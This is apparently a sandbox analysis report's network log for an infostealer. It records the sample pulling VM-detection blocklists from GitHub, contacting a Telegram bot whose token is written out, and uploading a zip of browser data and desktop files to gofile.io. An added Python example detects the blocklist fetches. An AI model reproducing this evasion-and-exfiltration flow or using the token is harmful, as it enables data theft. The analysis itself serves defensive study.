                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC1378INData Raw: 31 30 2e 32 30 30 2e 31 36 39 2e 32 30 34 0a 31 30 34 2e 31 39 38 2e 31 35 35 2e 31 37 33 0a 31 30 34 2e 32 30 30 2e 31 35 31 2e 33 35 0a 31 30 39 2e 31 34 35 2e 31 37 33 2e 31 36 39 0a 31 30 39 2e 32 32 36 2e 33 37 2e 31 37 32 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 30 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 31 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 32 0a 31 34 30 2e 32 32 38 2e 32 31 2e 33 36 0a 31 34 39 2e 38 38 2e 31 31 31 2e 37 39 0a 31 35 34 2e 36 31 2e 37 31 2e 35 30 0a 31 35 34 2e 36 31 2e 37 31 2e 35 31 0a 31 37 32 2e 31 30 35 2e 38 39 2e 32 30 32 0a 31 37 34 2e 37 2e 33 32 2e 31 39 39 0a 31 37 36 2e 36 33 2e 34 2e 31 37 39 0a 31 37 38 2e 32 33 39 2e 31 36 35 2e 37 30 0a 31 38 31 2e 32 31 34 2e 31 35 33 2e 31 31 0a 31 38 35 2e 32 32 30 2e 31 30 31
                                                                                                                                                                                                                                                          Data Ascii: 10.200.169.204104.198.155.173104.200.151.35109.145.173.169109.226.37.172109.74.154.90109.74.154.91109.74.154.92140.228.21.36149.88.111.79154.61.71.50154.61.71.51172.105.89.202174.7.32.199176.63.4.179178.239.165.70181.214.153.11185.220.101
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC1378INData Raw: 30 2e 31 31 38 0a 32 31 33 2e 33 33 2e 31 39 30 2e 31 37 31 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 37 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 33 35 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 36 0a 32 31 33 2e 33 33 2e 31 39 30 2e 36 39 0a 32 31 33 2e 33 33 2e 31 39 30 2e 37 34 0a 32 33 2e 31 32 38 2e 32 34 38 2e 34 36 0a 33 34 2e 31 30 35 2e 30 2e 32 37 0a 33 34 2e 31 30 35 2e 31 38 33 2e 36 38 0a 33 34 2e 31 30 35 2e 37 32 2e 32 34 31 0a 33 34 2e 31 33 38 2e 32 35 35 2e 31 30 34 0a 33 34 2e 31 33 38 2e 39 36 2e 32 33 0a 33 34 2e 31 34 31 2e 31 34 36 2e 31 31 34 0a 33 34 2e 31 34 31 2e 32 34 35 2e 32 35 0a 33 34 2e 31 34 32 2e 37 34
                                                                                                                                                                                                                                                          Data Ascii: 0.118213.33.190.171213.33.190.22213.33.190.227213.33.190.242213.33.190.35213.33.190.42213.33.190.46213.33.190.69213.33.190.7423.128.248.4634.105.0.2734.105.183.6834.105.72.24134.138.255.10434.138.96.2334.141.146.11434.141.245.2534.142.74
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC97INData Raw: 35 2e 37 31 2e 36 35 0a 39 35 2e 32 35 2e 37 31 2e 37 30 0a 39 35 2e 32 35 2e 37 31 2e 38 30 0a 39 35 2e 32 35 2e 37 31 2e 38 36 0a 39 35 2e 32 35 2e 37 31 2e 38 37 0a 39 35 2e 32 35 2e 37 31 2e 38 39 0a 39 35 2e 32 35 2e 37 31 2e 39 32 0a 39 35 2e 32 35 2e 38 31 2e 32 34 0a 4e 6f 6e 65 0a
                                                                                                                                                                                                                                                          Data Ascii: 5.71.6595.25.71.7095.25.71.8095.25.71.8695.25.71.8795.25.71.8995.25.71.9295.25.81.24None


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49735 | 185.199.110.133 | 443 | 4828 | C:\Users\user\AppData\Local\Temp\JOUNLV.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 09:57:12 UTC | 120 | OUT | GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-11-29 09:57:12 UTC | 896 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 1246
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "30981a4a96ce3533cb33ae7620077db7a4a8377cb1ef8fcfc8a07293fa2937d6"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 7E09:1CF27F:96EA1:A565C:67498FF6
Accept-Ranges: bytes
Date: Fri, 29 Nov 2024 09:57:12 GMT
Via: 1.1 varnish
X-Served-By: cache-ewr-kewr1740054-EWR
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1732874233.519931,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: f9305fd6f905583068a7b8074713863a284ba25b
Expires: Fri, 29 Nov 2024 10:02:12 GMT
Source-Age: 2
2024-11-29 09:57:12 UTC | 1246 | IN | Data Raw: 32 39 5f 5f 48 45 52 45 0a 32 47 36 43 37 5a 36 31 0a 32 52 4f 5f 38 55 56 55 0a 32 53 4e 35 33 38 4b 34 0a 35 4b 42 4b 34 31 5f 4c 0a 35 4c 58 50 41 38 45 53 0a 35 50 45 43 4e 36 4c 31 0a 35 52 50 46 54 33 48 5a 0a 36 42 4f 53 34 4f 37 55 0a 36 42 5a 50 32 59 32 5f 0a 36 46 34 34 41 44 52 37 0a 36 4d 50 41 39 33 0a 37 32 32 39 48 39 47 39 0a 37 34 5a 5a 43 59 37 41 0a 37 54 42 39 47 36 50 37 0a 38 34 4b 44 31 4b 53 4b 0a 38 4e 59 47 4b 33 46 4c 0a 38 59 33 42 53 58 4b 47 0a 39 53 46 37 32 46 47 37 0a 39 5a 37 37 44 4e 34 54 0a 5f 47 33 31 45 34 36 4e 0a 5f 50 48 4c 4e 59 47 52 0a 5f 54 39 57 35 4c 48 4f 0a 41 46 52 42 52 36 54 43 0a 41 4d 44 20 52 61 64 65 6f 6e 20 48 44 20 38 36 35 30 47 0a 41 53 50 45 45 44 20 47 72 61 70 68 69 63 73 20 46 61 6d 69 6c
Data Ascii (one entry per line in the response, newline-separated): 29__HERE, 2G6C7Z61, 2RO_8UVU, 2SN538K4, 5KBK41_L, 5LXPA8ES, 5PECN6L1, 5RPFT3HZ, 6BOS4O7U, 6BZP2Y2_, 6F44ADR7, 6MPA93, 7229H9G9, 74ZZCY7A, 7TB9G6P7, 84KD1KSK, 8NYGK3FL, 8Y3BSXKG, 9SF72FG7, 9Z77DN4T, _G31E46N, _PHLNYGR, _T9W5LHO, AFRBR6TC, AMD Radeon HD 8650G, ASPEED Graphics Famil


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49737 | 185.199.110.133 | 443 | 4828 | C:\Users\user\AppData\Local\Temp\JOUNLV.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 09:57:12 UTC | 123 | OUT | GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-11-29 09:57:12 UTC | 897 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 1110
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "1224175461dce581d971884e2b8af67d12f105702cbcc56be1043ccc84319e42"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: AD0E:370AE7:92613:A0DDF:67498FF8
Accept-Ranges: bytes
Date: Fri, 29 Nov 2024 09:57:12 GMT
Via: 1.1 varnish
X-Served-By: cache-ewr-kewr1740046-EWR
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1732874233.531647,VS0,VE8
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: d7ae3d89f5bc11fac2160f12f285813484371612
Expires: Fri, 29 Nov 2024 10:02:12 GMT
Source-Age: 0
2024-11-29 09:57:12 UTC | 1110 | IN | Data Raw: 30 38 31 61 62 33 39 35 2d 35 65 38 35 2d 34 36 33 34 2d 61 63 64 62 2d 32 64 62 64 34 66 35 39 61 37 64 30 0a 30 38 39 65 36 32 31 63 2d 31 34 32 32 2d 34 38 35 36 2d 61 38 62 31 2d 33 66 31 64 62 32 30 38 63 65 39 65 0a 31 30 37 39 37 66 31 64 2d 39 36 31 33 2d 34 38 33 32 2d 62 31 61 33 2d 63 32 32 66 65 33 36 35 62 38 39 64 0a 31 35 39 34 37 38 30 32 2d 63 62 39 63 2d 34 37 38 66 2d 61 66 35 63 2d 33 33 62 31 61 62 62 64 31 62 66 65 0a 31 61 38 35 63 36 36 30 2d 31 66 39 38 2d 34 32 63 61 2d 62 31 63 62 2d 31 39 39 66 36 33 65 31 64 38 30 37 0a 32 62 35 33 36 35 66 31 2d 65 65 62 62 2d 34 31 33 35 2d 62 36 65 31 2d 34 31 33 61 61 62 32 39 39 66 63 62 0a 34 35 30 38 61 66 64 33 2d 35 66 30 35 2d 34 39 31 65 2d 62 34 39 66 2d 62 34 34 30 32 34 39 36 37
Data Ascii (one GUID per line in the response, newline-separated): 081ab395-5e85-4634-acdb-2dbd4f59a7d0, 089e621c-1422-4856-a8b1-3f1db208ce9e, 10797f1d-9613-4832-b1a3-c22fe365b89d, 15947802-cb9c-478f-af5c-33b1abbd1bfe, 1a85c660-1f98-42ca-b1cb-199f63e1d807, 2b5365f1-eebb-4135-b6e1-413aab299fcb, 4508afd3-5f05-491e-b49f-b44024967
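
The sessions above are the sample's environment check: one process (PID 4828, JOUNLV.exe) pulls several plain-text blocklists (GPU names, MachineGuid values, usernames) from the public 6nz/virustotal-vm-blacklist repository on raw.githubusercontent.com and compares them against the host. The following is an added example, not code from the Joe Sandbox report or from the sample, showing two things a defender would want from these records: a log check that flags that fetch pattern and alerts when one PID pulls more than one of the lists, and a decoder that turns the report's "Data Raw" hex back into list entries, joining chunks before splitting so that an entry cut at a chunk boundary (like the leading "5.71.65" in the 97-byte chunk) is not reported as a fragment. The one-line-per-request log format, the benign fourth log line and the two-chunk hex sample are constructed for this example; the host, path, PID and process values are taken from sessions 3 to 5.

```python
"""Added example, not code from the Joe Sandbox report or from the sample.

  1. Flag requests for *.txt under /6nz/virustotal-vm-blacklist/main/ on
     raw.githubusercontent.com and alert when one PID fetches several lists.
  2. Rebuild newline-separated list entries from the report's "Data Raw" hex,
     concatenating chunks before splitting.

Assumptions (ours, not the report's): the log format below, the benign fourth
log line and the two-chunk hex sample are constructed for this example.
"""
import re
from collections import defaultdict

BLACKLIST_HOST = "raw.githubusercontent.com"
BLACKLIST_PATH_PREFIX = "/6nz/virustotal-vm-blacklist/main/"

# Constructed log: "<src> <dst> <pid> <process> <method> <path> <host>" per line.
# Rows 1-3 carry the values of sessions 3-5 in the report; row 4 is a
# constructed benign fetch from the same CDN host, so the rule must not fire.
SAMPLE_LOG = r"""
192.168.2.4:49735 185.199.110.133:443 4828 C:\Users\user\AppData\Local\Temp\JOUNLV.exe GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt raw.githubusercontent.com
192.168.2.4:49737 185.199.110.133:443 4828 C:\Users\user\AppData\Local\Temp\JOUNLV.exe GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt raw.githubusercontent.com
192.168.2.4:49734 185.199.110.133:443 4828 C:\Users\user\AppData\Local\Temp\JOUNLV.exe GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt raw.githubusercontent.com
192.168.2.4:49800 185.199.110.133:443 1234 C:\Tools\updater.exe GET /someuser/somerepo/main/README.md raw.githubusercontent.com
"""

# Process paths in this constructed format contain no spaces (assumption).
LOG_RE = re.compile(
    r"^(?P<src>\S+) (?P<dst>\S+) (?P<pid>\d+) (?P<proc>\S+) "
    r"(?P<method>[A-Z]+) (?P<path>\S+) (?P<host>\S+)$"
)


def parse_log(text):
    """Parse the constructed log format into dicts; unmatched lines are skipped."""
    return [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]


def is_vm_blacklist_fetch(host, path):
    """True for any .txt pulled from the 6nz/virustotal-vm-blacklist repo."""
    return (host.lower() == BLACKLIST_HOST
            and path.startswith(BLACKLIST_PATH_PREFIX)
            and path.endswith(".txt"))


def fetched_lists_by_pid(events):
    """Map PID -> set of blocklist file names that process requested."""
    by_pid = defaultdict(set)
    for ev in events:
        if is_vm_blacklist_fetch(ev["host"], ev["path"]):
            by_pid[ev["pid"]].add(ev["path"].rsplit("/", 1)[-1])
    return dict(by_pid)


def alerts(events, min_lists=2):
    """(pid, process, sorted file names) for each process that fetched at least
    `min_lists` distinct lists. One fetch could be a researcher or a dev tool;
    several from the same PID in one run is the malware's environment check."""
    procs = {ev["pid"]: ev["proc"] for ev in events}
    return [(pid, procs[pid], sorted(files))
            for pid, files in fetched_lists_by_pid(events).items()
            if len(files) >= min_lists]


def decode_data_raw(hex_chunks):
    """Rebuild the newline-separated list from 'Data Raw' hex dumps.

    Chunks are concatenated before splitting: a value may straddle a chunk
    boundary, so splitting each chunk on its own yields fragments."""
    raw = b"".join(bytes.fromhex(chunk) for chunk in hex_chunks)
    return [entry for entry in raw.decode("utf-8").split("\n") if entry]


# Constructed two-chunk sample: hex of "95.25.71.70\n95.25.7" and "1.80\nNone\n",
# with the second address deliberately split across the chunk boundary.
SAMPLE_CHUNKS = [
    "39 35 2e 32 35 2e 37 31 2e 37 30 0a 39 35 2e 32 35 2e 37",
    "31 2e 38 30 0a 4e 6f 6e 65 0a",
]

if __name__ == "__main__":
    for pid, proc, files in alerts(parse_log(SAMPLE_LOG)):
        print(f"ALERT pid={pid} {proc} fetched VM blocklists: {', '.join(files)}")
    print("joined:   ", decode_data_raw(SAMPLE_CHUNKS))
    print("per-chunk:", [decode_data_raw([c]) for c in SAMPLE_CHUNKS])
```

The alert keys on the combination (public repository path plus more than one list file from a single PID) rather than on the CDN host alone, since raw.githubusercontent.com serves plenty of legitimate traffic; the literal "None" at the end of a list is a real entry in the served file, not a decoder artefact, and is kept.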


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49734 | 185.199.110.133 | 443 | 4828 | C:\Users\user\AppData\Local\Temp\JOUNLV.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 09:57:12 UTC | 128 | OUT | GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-11-29 09:57:12 UTC | 896 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 1275
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "bbf75a064e165fba2b8fcc6595e496788fe27c3185ffa2fa56d3479e12867693"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: E854:128C4E:AEAFA:BD2CE:67498FF8
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:12 GMT
                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                          X-Served-By: cache-ewr-kewr1740041-EWR
                                                                                                                                                                                                                                                          X-Cache: HIT
                                                                                                                                                                                                                                                          X-Cache-Hits: 1
                                                                                                                                                                                                                                                          X-Timer: S1732874233.566920,VS0,VE1
                                                                                                                                                                                                                                                          Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          X-Fastly-Request-ID: fdaaa3148eec392ac7a87dbe690e9a020d8e548f
                                                                                                                                                                                                                                                          Expires: Fri, 29 Nov 2024 10:02:12 GMT
                                                                                                                                                                                                                                                          Source-Age: 0
                                                                                                                                                                                                                                                          2024-11-29 09:57:12 UTC1275INData Raw: 30 35 68 30 30 47 69 30 0a 30 35 4b 76 41 55 51 4b 50 51 0a 32 31 7a 4c 75 63 55 6e 66 49 38 35 0a 33 75 32 76 39 6d 38 0a 34 33 42 79 34 0a 34 74 67 69 69 7a 73 4c 69 6d 53 0a 35 73 49 42 4b 0a 35 59 33 79 37 33 0a 67 72 65 70 65 74 65 0a 36 34 46 32 74 4b 49 71 4f 35 0a 36 4f 34 4b 79 48 68 4a 58 42 69 52 0a 37 44 42 67 64 78 75 0a 37 77 6a 6c 47 58 37 50 6a 6c 57 34 0a 38 4c 6e 66 41 61 69 39 51 64 4a 52 0a 38 4e 6c 30 43 6f 6c 4e 51 35 62 71 0a 38 56 69 7a 53 4d 0a 39 79 6a 43 50 73 45 59 49 4d 48 0a 41 62 62 79 0a 61 63 6f 78 0a 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 0a 41 6d 79 0a 61 6e 64 72 65 61 0a 41 70 70 4f 6e 46 6c 79 53 75 70 70 6f 72 74 0a 41 53 50 4e 45 54 0a 61 7a 75 72 65 0a 62 61 72 62 61 72 72 61 79 0a 62 65 6e 6a 61 68 0a 42 72 75 6e
                                                                                                                                                                                                                                                          Data Ascii: 05h00Gi005KvAUQKPQ21zLucUnfI853u2v9m843By44tgiizsLimS5sIBK5Y3y73grepete64F2tKIqO56O4KyHhJXBiR7DBgdxu7wjlGX7PjlW48LnfAai9QdJR8Nl0ColNQ5bq8VizSM9yjCPsEYIMHAbbyacoxAdministratorAmyandreaAppOnFlySupportASPNETazurebarbarraybenjahBrun


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49738 | 188.138.68.212 | 443 | 4924 | C:\Users\user\Desktop\LKxcbzlwkz.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 09:57:13 UTC | 90 | OUT | GET /checkip/ HTTP/1.1
User-Agent: AutoIt
Host: ip-score.com
Connection: Keep-Alive
2024-11-29 09:57:13 UTC | 257 | IN | HTTP/1.1 200 OK
Server: nginx/1.19.1
Date: Fri, 29 Nov 2024 09:57:16 GMT
Content-Type: text/html
Content-Length: 1865
Last-Modified: Sun, 20 Feb 2022 14:25:18 GMT
Connection: close
Vary: Accept-Encoding
ETag: "62124f4e-749"
Accept-Ranges: bytes
2024-11-29 09:57:13 UTC | 1865 | IN | Data Ascii: <!DOCTYPE html><html lang=""><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" sizes="16x16" href="/img/favicon-16.png"><link rel="icon" siz


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49739 | 149.154.167.220 | 443 | 4828 | C:\Users\user\AppData\Local\Temp\JOUNLV.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 09:57:14 UTC | 121 | OUT | GET /bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/getMe HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-11-29 09:57:15 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 29 Nov 2024 09:57:15 GMT
Content-Type: application/json
Content-Length: 260
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-29 09:57:15 UTC | 260 | IN | Data Ascii: {"ok":true,"result":{"id":7944498476,"is_bot":true,"first_name":"Patriotrosh","username":"Patriotp210Rohs_bot","can_join_groups":true,"can_read_all_group_messages":false,"supports_inline_queries":false,"can_connect_to_business":false,"has_main_web_app":fa


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49742 | 45.112.123.126 | 443 | 4828 | C:\Users\user\AppData\Local\Temp\JOUNLV.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 09:57:21 UTC | 70 | OUT | GET /servers HTTP/1.1
Host: api.gofile.io
Connection: Keep-Alive
2024-11-29 09:57:21 UTC | 1116 | IN | HTTP/1.1 200 OK
Server: nginx/1.27.1
Date: Fri, 29 Nov 2024 09:57:21 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 387
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
Access-Control-Allow-Credentials: true
Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 0
ETag: W/"183-H+Hlj8zn8rXEzor2CTL15HpbTK0"
2024-11-29 09:57:21 UTC | 387 | IN | Data Ascii: {"status":"ok","data":{"servers":[{"name":"store6","zone":"eu"},{"name":"store10","zone":"eu"},{"name":"store1","zone":"eu"},{"name":"store2","zone":"eu"}],"serversAllZone":[{"name":"store9","zone":"na"},{"name":"store6","zone":"eu"},{"name":"store3","zon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49743 | 31.14.70.249 | 443 | 4828 | C:\Users\user\AppData\Local\Temp\JOUNLV.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 09:57:23 UTC | 207 | OUT | POST /uploadfile HTTP/1.1
  Content-Type: multipart/form-data; boundary="b1c2b79f-406c-402d-977e-4b21d28af094"
  Host: store6.gofile.io
  Content-Length: 121972
  Expect: 100-continue
  Connection: Keep-Alive
2024-11-29 09:57:24 UTC | 40 | OUT | Data Raw: 2d 2d 62 31 63 32 62 37 39 66 2d 34 30 36 63 2d 34 30 32 64 2d 39 37 37 65 2d 34 62 32 31 64 32 38 61 66 30 39 34 0d 0a
  Data Ascii: --b1c2b79f-406c-402d-977e-4b21d28af094
2024-11-29 09:57:24 UTC | 123 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6a 6f 6e 65 73 40 37 32 34 35 33 36 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 6a 6f 6e 65 73 25 34 30 37 32 34 35 33 36 5f 65 6e 2d 43 48 2e 7a 69 70 0d 0a 0d 0a
  Data Ascii: Content-Disposition: form-data; name=file; filename="user@724536_en-CH.zip"; filename*=utf-8''user%40724536_en-CH.zip
2024-11-29 09:57:24 UTC | 4096 | OUT | Data Raw: 50 4b 03 04 14 00 01 08 00 00 27 27 7d 59 00 00 00 00 0c 00 00 00 00 00 00 00 19 00 00 00 42 72 6f 77 73 65 72 73 2f 45 64 67 65 2f 48 69 73 74 6f 72 79 2e 74 78 74 13 a7 e5 81 eb b9 86 2b e9 43 dc 28 50 4b 03 04 14 00 09 08 08 00 27 27 7d 59 71 80 43 5d 74 00 00 00 dc 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 2f 46 69 72 65 66 6f 78 2f 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 55 94 f1 30 4a 16 a7 36 ae 0b 68 bf 86 f3 9d df 2f b1 9f 8c ed 9d bf 5a 32 54 11 e9 64 1e bf 42 1d dc c0 1c d8 e0 63 32 30 a0 2c e4 3b b0 2d c3 16 51 83 c4 e9 ce 6f 89 8e 04 7c b5 a7 a5 a9 f1 a8 50 9f 12 25 1b e4 26 c5 7a 0e 0a 1c a5 d8 52 d3 39 26 fe 37 77 7b 6d 7a 55 6a 04 20 40 12 06 21 9a 03 a8 80 b1 80 7a 98 84 f0 a5 d0 54 eb 52 86 bf d3 cd 50 4b 07 08 71 80 43 5d 74 00 00 00
  Data Ascii: PK''}YBrowsers/Edge/History.txt+C(PK''}YqC]tBrowsers/Firefox/Bookmarks.txtU0J6h/Z2TdBc20,;-Qo|P%&zR9&7w{mzUj @!zTRPKqC]t
2024-11-29 09:57:24 UTC | 4096 | OUT | Data Raw: 44 cf f7 08 db 79 b2 b5 af 5f b9 74 db 28 58 49 06 bf d3 7b c4 df c5 38 91 8f 19 8d b0 f7 4f c0 e2 d5 11 3f b9 d0 b5 2c 84 84 b1 fd cd ba ab d7 2e e8 0a a2 41 8e c3 8e f3 3b da 0f 90 ea 92 0a 9a fa 49 12 a5 02 8e 5e 08 67 86 62 de 67 79 91 6c cf 92 46 a2 20 45 84 e4 4c 25 fe f8 39 e2 7e c4 68 22 71 de 1a df ed 27 d1 6c 2b ad 6c c7 62 2d 37 9f 8f 54 30 72 fb 4d 10 5e ce 9e 77 b8 0d c3 d8 0f bc 41 fc 27 ef 4d a4 32 08 4a 9f 86 cf cf 5a af 38 43 85 e9 04 bc 16 75 67 5b 4a 19 64 0c 63 40 6b de 82 78 7f dd f6 82 95 42 f5 d4 b4 1b f0 54 98 79 bf 8a d3 39 4b 2d f5 ed 20 10 a7 41 b7 92 13 12 a8 d9 a8 df 48 21 cc 30 b8 da 2d c3 16 82 3b 26 05 06 5f 7a 97 9a f3 da 56 9c fe ae cb 34 f8 82 f0 94 f0 f4 51 73 9f f8 d4 65 81 86 9c 1e b2 8a df 64 62 8b 78 78 8d 14 57 27
  Data Ascii: Dy_t(XI{8O?,.A;I^gbgylF EL%9~h"q'l+lb-7T0rM^wA'M2JZ8Cug[Jdc@kxBTy9K- AH!0-;&_zV4QsedbxxW'
2024-11-29 09:57:24 UTC | 4096 | OUT | Data Raw: 65 b2 06 9b 6c 5c b2 5e a2 0c a8 5c ee 5b 69 51 f9 c7 0b 64 26 43 b1 4f e2 5d 5c 1f 74 95 bf 29 c2 60 52 3e 13 34 25 f7 33 50 4b 07 08 43 fa 88 fe 91 02 00 00 02 04 00 00 50 4b 03 04 14 00 09 08 08 00 55 40 44 57 c8 29 ec a0 95 02 00 00 02 04 00 00 33 00 00 00 47 72 61 62 62 65 72 2f 44 52 49 56 45 2d 43 2f 55 73 65 72 73 2f 6a 6f 6e 65 73 2f 44 65 73 6b 74 6f 70 2f 57 55 54 4a 53 43 42 43 46 58 2e 64 6f 63 78 23 18 3f ab 71 64 0d f1 ce b4 b2 27 77 ad 37 43 08 5a dc 20 f6 32 70 8e 3b d6 71 31 ef c3 fd 51 f8 a3 da 0d 55 88 0f 26 ae ee f7 f8 e8 7d 2f 04 8a 75 5c 92 65 1f 58 2b be 80 c1 91 1b b0 bf ed 8f 0b d1 37 d0 5d ef 45 17 29 e2 a3 2e ad 2e 2a f8 2b ce 1a 3d 8d 72 7a c7 56 28 1d 88 a8 ca c7 05 f1 10 1e f2 0c cd e7 cc 1b 16 12 83 2b 2c 34 02 0f fd eb 21
  Data Ascii: el\^\[iQd&CO]\t)`R>4%3PKCPKU@DW)3Grabber/DRIVE-C/Users/user/Desktop/WUTJSCBCFX.docx#?qd'w7CZ 2p;q1QU&}/u\eX+7]E)..*+=rzV(+,4!
2024-11-29 09:57:24 UTC | 4096 | OUT | Data Raw: b9 18 e5 a8 7a 4d 82 90 81 11 51 ad 10 2f 57 53 da 7c 74 96 09 a6 ae 28 ad 64 cc 6f 74 31 f0 65 13 f7 be 73 67 4a 2a b5 16 98 c5 97 ba ae aa ba d3 ae 5b e8 e0 ae a5 51 b7 59 34 38 2d 71 3f 7a 82 7a fb 37 89 95 3a 60 4f 70 f7 1c 2e 2a e9 6b b0 cc 94 a9 9a 11 77 bc ad 85 bd b3 0f 25 0e 05 00 10 c3 64 ef d2 a8 d8 65 8e ca cf 1b 19 aa ee 19 22 09 e8 71 fb 46 83 86 d1 73 91 a4 21 db 43 42 c4 00 70 e7 14 ba e7 4f 8f 54 0c bb ad 09 74 ca 7a 9c e6 fa dc 3d db 3a a1 08 9c ba da e4 72 e5 bf fe 71 ed 2e b9 8f d5 41 79 39 77 98 df d4 d3 29 db ef 47 5d cf 12 6c b8 b3 65 98 7d 97 f0 dd c0 49 0a be bf b7 0d 30 cd 73 08 4c 8e 8c e0 18 95 e4 f3 00 94 bc df c1 d6 8d d6 6b 36 e1 f0 b6 60 0f 4d 35 26 d5 5a 40 f7 45 b8 2a a9 ad 4a fb 4a 25 56 25 ee c7 c1 cf a3 7d 8d 9d 96 c3
  Data Ascii: zMQ/WS|t(dot1esgJ*[QY48-q?zz7:`Op.*kw%de"qFs!CBpOTtz=:rq.Ay9w)G]le}I0sLk6`M5&Z@E*JJ%V%}
